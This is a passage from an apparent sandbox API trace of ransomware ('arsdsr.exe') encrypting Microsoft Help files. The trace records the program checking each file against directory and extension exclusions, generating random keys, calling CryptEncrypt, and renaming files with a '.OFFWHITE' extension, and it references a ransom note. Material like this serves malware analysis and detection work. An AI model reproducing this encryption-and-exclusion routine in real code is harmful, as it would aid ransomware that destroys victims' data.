pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.320] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x15e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.320] SetLastError (dwErrCode=0x0) [0147.320] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.321] GetLastError () returned 0x0 [0147.321] GetLastError () returned 0x0 [0147.321] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x25e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.321] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.321] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x35e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.321] WriteFile (in: hFile=0xb0, lpBuffer=0x526b98*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526b98*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.321] GetProcessHeap () returned 0x500000 [0147.322] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x15e) returned 0x52ebe8 [0147.322] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.322] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x15e, lpOverlapped=0x0) returned 1 [0147.322] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.322] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x15e, lpOverlapped=0x0) returned 1 [0147.322] GetProcessHeap () returned 0x500000 [0147.322] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.322] CloseHandle (hObject=0xb0) returned 1 [0147.322] GetProcessHeap () returned 0x500000 [0147.322] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.322] GetProcessHeap () returned 0x500000 [0147.322] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.322] GetProcessHeap () returned 0x500000 [0147.322] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.322] GetProcessHeap () returned 0x500000 [0147.322] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.322] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" [0147.322] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.OFFWHITE" [0147.323] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn.offwhite")) returned 1 [0147.323] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.GRAPH.14.1033.hxn", cAlternateFileName="MSGRAP~1.HXN")) returned 1 [0147.323] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2=".") returned 1 [0147.323] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="..") returned 1 [0147.323] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="...") returned 1 [0147.323] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="windows") returned -1 [0147.323] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.323] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="rsa") returned -1 [0147.323] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.324] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="programdata") returned -1 [0147.324] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="appdata") returned 1 [0147.324] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="program files") returned -1 [0147.324] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.324] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.324] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.GRAPH.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" [0147.324] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.324] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.324] PathFindExtensionW (pszPath="MS.GRAPH.14.1033.hxn") returned=".hxn" [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.324] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.324] lstrcmpiW (lpString1="MS.GRAPH.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.324] GetProcessHeap () returned 0x500000 [0147.325] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526ba8 [0147.325] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.368] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=326) returned 1 [0147.368] GetProcessHeap () returned 0x500000 [0147.368] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.369] GetProcessHeap () returned 0x500000 [0147.369] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.369] GetProcessHeap () returned 0x500000 [0147.369] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.369] GetProcessHeap () returned 0x500000 [0147.369] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.369] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.369] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.369] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.369] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.369] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.369] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.369] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.369] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.369] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.369] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.370] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.370] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.370] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x146, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.370] SetLastError (dwErrCode=0x0) [0147.370] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.372] GetLastError () returned 0x0 [0147.372] GetLastError () returned 0x0 [0147.372] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x246, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.372] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.372] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x346, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.372] WriteFile (in: hFile=0xb0, lpBuffer=0x526ba8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526ba8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.372] GetProcessHeap () returned 0x500000 [0147.372] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x146) returned 0x51d650 [0147.372] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.372] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x146, lpOverlapped=0x0) returned 1 [0147.373] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.373] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x146, lpOverlapped=0x0) returned 1 [0147.373] GetProcessHeap () returned 0x500000 [0147.373] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.373] CloseHandle (hObject=0xb0) returned 1 [0147.373] GetProcessHeap () returned 0x500000 [0147.373] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.373] GetProcessHeap () returned 0x500000 [0147.373] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.373] GetProcessHeap () returned 0x500000 [0147.373] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.373] GetProcessHeap () returned 0x500000 [0147.373] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.373] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" [0147.373] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.OFFWHITE" [0147.373] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn.offwhite")) returned 1 [0147.374] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfd789af0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd789af0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd822070, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.GROOVE.14.1033.hxn", cAlternateFileName="MSGROO~1.HXN")) returned 1 [0147.374] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2=".") returned 1 [0147.374] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="..") returned 1 [0147.374] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="...") returned 1 [0147.374] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="windows") returned -1 [0147.374] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.374] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="rsa") returned -1 [0147.374] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.374] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="programdata") returned -1 [0147.374] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="appdata") returned 1 [0147.374] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="program files") returned -1 [0147.375] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.375] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.375] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.GROOVE.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" [0147.375] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.375] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.375] PathFindExtensionW (pszPath="MS.GROOVE.14.1033.hxn") returned=".hxn" [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.375] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.375] lstrcmpiW (lpString1="MS.GROOVE.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.375] GetProcessHeap () returned 0x500000 [0147.375] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526bb8 [0147.375] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.400] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=332) returned 1 [0147.400] GetProcessHeap () returned 0x500000 [0147.400] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.400] GetProcessHeap () returned 0x500000 [0147.400] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.400] GetProcessHeap () returned 0x500000 [0147.400] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.400] GetProcessHeap () returned 0x500000 [0147.400] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.400] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.400] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.400] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.400] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.401] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.401] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.401] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.401] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.401] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.401] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.401] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.401] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.401] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x14c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.401] SetLastError (dwErrCode=0x0) [0147.401] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.403] GetLastError () returned 0x0 [0147.403] GetLastError () returned 0x0 [0147.403] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x24c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.403] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.403] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x34c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.403] WriteFile (in: hFile=0xb0, lpBuffer=0x526bb8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526bb8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.403] GetProcessHeap () returned 0x500000 [0147.403] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x14c) returned 0x51d650 [0147.403] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.403] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x14c, lpOverlapped=0x0) returned 1 [0147.403] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.403] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x14c, lpOverlapped=0x0) returned 1 [0147.404] GetProcessHeap () returned 0x500000 [0147.404] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.404] CloseHandle (hObject=0xb0) returned 1 [0147.404] GetProcessHeap () returned 0x500000 [0147.404] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.404] GetProcessHeap () returned 0x500000 [0147.404] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.404] GetProcessHeap () returned 0x500000 [0147.404] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.404] GetProcessHeap () returned 0x500000 [0147.404] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.404] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" [0147.404] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.OFFWHITE" [0147.404] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn.offwhite")) returned 1 [0147.405] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11446a50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.INFOPATH.14.1033.hxn", cAlternateFileName="MSINFO~1.HXN")) returned 1 [0147.405] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2=".") returned 1 [0147.405] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="..") returned 1 [0147.405] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="...") returned 1 [0147.405] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="windows") returned -1 [0147.405] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.405] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="rsa") returned -1 [0147.405] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.405] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="programdata") returned -1 [0147.405] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="appdata") returned 1 [0147.405] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="program files") returned -1 [0147.405] lstrcmpiW (lpString1="MS.INFOPATH.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.405] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.405] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.INFOPATH.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft 